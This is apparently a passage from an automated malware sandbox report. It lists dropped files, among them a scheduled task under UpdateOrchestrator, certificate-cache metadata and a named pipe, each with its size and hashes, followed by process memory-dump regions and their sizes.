                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                      SHA1

                                                                                                                                                      5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                      SHA256

                                                                                                                                                      55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                      SHA512

                                                                                                                                                      5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                      SHA1

                                                                                                                                                      9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                      SHA256

                                                                                                                                                      a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                      SHA512

                                                                                                                                                      c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                    • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                      Filesize

                                                                                                                                                      328B

                                                                                                                                                      MD5

                                                                                                                                                      4d23201f16a5988133fd7074e929331a

                                                                                                                                                      SHA1

                                                                                                                                                      2c5f77127a46425878b3022194e04f7c3a04a5fd

                                                                                                                                                      SHA256

                                                                                                                                                      04afa365f8188364dfabbe9c97ac766a7534eef7d242dd652d927f89a233b1e5

                                                                                                                                                      SHA512

                                                                                                                                                      3f46a8df252b7c417185bbec4753928901055d9cbdab9bed674c3b00cfe08545e84551acca3012dd959d5ce1a20a6f659580c8119588373fc3a6fabea46f8818

                                                                                                                                                    • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                                                      Filesize

                                                                                                                                                      330B

                                                                                                                                                      MD5

                                                                                                                                                      5cb7f36bb260a9845cd1bbd7d9b92682

                                                                                                                                                      SHA1

                                                                                                                                                      b51f697d260f65a225ac9eb8e500128da8d4d947

                                                                                                                                                      SHA256

                                                                                                                                                      126d9b3fd61d306092ea3ef4939a3a726101380d4c87d2856641ef47088c485b

                                                                                                                                                      SHA512

                                                                                                                                                      e6f252447be9c710939662d22e55f86df7bcbe39302fdc3e24b698c76cffd49c313b442f089ea52ffbd969591ed381dc3ae1e0a3e990fe0e1514f68b948016c6

                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                                                                                      Filesize

                                                                                                                                                      412B

                                                                                                                                                      MD5

                                                                                                                                                      fd878767f9eb171c84eda7c39a26ba98

                                                                                                                                                      SHA1

                                                                                                                                                      69c30945a77ea87955c088817a3c36a3cc3ccebf

                                                                                                                                                      SHA256

                                                                                                                                                      fade82220f53e528bb81260fa6a1a2c421eb1210dd408c5460e07e09999d8edf

                                                                                                                                                      SHA512

                                                                                                                                                      476b3bdb2e66ea23c1caaea1c410f6fa846f2e47f594736056653b09b480f13cc1b3031f6e478fbe65b16285088149868b871dd805b818f2368af101e734732e

                                                                                                                                                    • \??\pipe\$sxrchildproc34226543a32
                                                                                                                                                      MD5

                                                                                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                      SHA1

                                                                                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                      SHA256

                                                                                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                      SHA512

                                                                                                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                    • memory/332-107-0x0000013BBC4E0000-0x0000013BBC507000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/332-117-0x00007FF7DF150000-0x00007FF7DF160000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/632-102-0x0000026392AF0000-0x0000026392B12000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/632-106-0x0000026392B20000-0x0000026392B47000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/632-115-0x00007FF7DF150000-0x00007FF7DF160000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/688-111-0x000001F69C6D0000-0x000001F69C6F7000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/688-126-0x00007FF7DF150000-0x00007FF7DF160000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1188-32-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      24KB

                                                                                                                                                    • memory/1188-35-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      24KB

                                                                                                                                                    • memory/2172-380-0x00007FFFFF523000-0x00007FFFFF525000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/2172-24-0x0000024600E60000-0x0000024600EB8000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      352KB

                                                                                                                                                    • memory/2172-4-0x00007FFFFF523000-0x00007FFFFF525000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/2172-14-0x000002466DEC0000-0x000002466DEE2000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/2172-15-0x00007FFFFF520000-0x00007FFFFFFE1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/2172-16-0x00007FFFFF520000-0x00007FFFFFFE1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/2172-17-0x0000024610000000-0x0000024610024000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      144KB

                                                                                                                                                    • memory/2172-381-0x00007FFFFF520000-0x00007FFFFFFE1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/2172-28-0x00000246011A0000-0x00000246011AA000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                    • memory/2172-26-0x00007FF81F0D0000-0x00007FF81F2C5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/2172-25-0x0000024600EC0000-0x0000024600EE2000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/2172-19-0x00007FF81DE30000-0x00007FF81DEEE000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      760KB

                                                                                                                                                    • memory/2172-18-0x00007FF81F0D0000-0x00007FF81F2C5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/2172-20-0x0000024600300000-0x0000024600D50000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.3MB

                                                                                                                                                    • memory/2172-22-0x0000024600D50000-0x0000024600DF6000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      664KB

                                                                                                                                                    • memory/2172-1667-0x00007FF80F303000-0x00007FF80F304000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/2172-23-0x0000024600E00000-0x0000024600E56000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      344KB

                                                                                                                                                    • memory/2172-1668-0x00007FFFFF520000-0x00007FFFFFFE1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/2432-100-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      160KB

                                                                                                                                                    • memory/2432-91-0x00007FF81F0D0000-0x00007FF81F2C5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/2432-92-0x00007FF81DE30000-0x00007FF81DEEE000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      760KB

                                                                                                                                                    • memory/2432-90-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      160KB

                                                                                                                                                    • memory/2432-89-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      160KB

                                                                                                                                                    • memory/3644-31-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      16KB

                                                                                                                                                    • memory/3644-29-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      16KB

                                                                                                                                                    • memory/3740-61-0x000001CD34650000-0x000001CD34E1A000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      7.8MB

                                                                                                                                                    • memory/3740-73-0x000001CD2D0D0000-0x000001CD2D182000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      712KB

                                                                                                                                                    • memory/3740-59-0x00007FF81DE30000-0x00007FF81DEEE000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      760KB

                                                                                                                                                    • memory/3740-60-0x000001CD2C0C0000-0x000001CD2C646000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      5.5MB

                                                                                                                                                    • memory/3740-74-0x000001CD2D360000-0x000001CD2D522000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      1.8MB

                                                                                                                                                    • memory/3740-62-0x000001CD34E20000-0x000001CD3525E000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      4.2MB

                                                                                                                                                    • memory/3740-63-0x000001CD2BD90000-0x000001CD2BE42000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      712KB

                                                                                                                                                    • memory/3740-64-0x00007FF81F0D0000-0x00007FF81F2C5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/3740-72-0x000001CD2CFC0000-0x000001CD2D010000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      320KB

                                                                                                                                                    • memory/3740-58-0x00007FF81F0D0000-0x00007FF81F2C5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/3740-84-0x000001CD2D010000-0x000001CD2D04C000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      240KB

                                                                                                                                                    • memory/3740-85-0x000001CD2CA50000-0x000001CD2CA9E000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      312KB

                                                                                                                                                    • memory/3740-87-0x00007FF81DE30000-0x00007FF81DEEE000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      760KB

                                                                                                                                                    • memory/3740-86-0x00007FF81F0D0000-0x00007FF81F2C5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/3740-88-0x000001CD2D050000-0x000001CD2D086000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      216KB

                                                                                                                                                    • memory/5064-93-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      128KB

                                                                                                                                                    • memory/5064-94-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      128KB

                                                                                                                                                    • memory/5064-96-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      128KB

                                                                                                                                                    • memory/5064-98-0x0000000000B40000-0x0000000000B5A000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      104KB